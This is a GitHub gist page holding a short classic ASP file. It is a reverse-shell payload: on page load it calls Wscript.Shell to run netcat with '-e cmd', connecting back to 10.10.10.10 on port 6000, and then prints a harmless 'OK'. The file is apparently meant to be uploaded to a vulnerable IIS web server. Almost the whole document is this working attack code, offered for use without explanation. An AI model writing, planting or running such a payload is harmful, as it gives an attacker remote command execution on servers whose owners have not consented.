Skip to content

Instantly share code, notes, and snippets.

@int0x33
Created January 24, 2019 17:10
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save int0x33/5b341b745ffcb4d92c3da1c2d2caba42 to your computer and use it in GitHub Desktop.
Save int0x33/5b341b745ffcb4d92c3da1c2d2caba42 to your computer and use it in GitHub Desktop.
<%
Sub Page_Load
'1st test
Dim objShell : Set objShell = Server.CreateObject("Wscript.Shell")
objshell.Run("C:\www\nc.exe 10.10.10.10 6000 -e cmd")
End Sub
%>
<!DOCTYPE html>
<html>
<body>
<% Page_Load %>
<h3>OK</h3>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment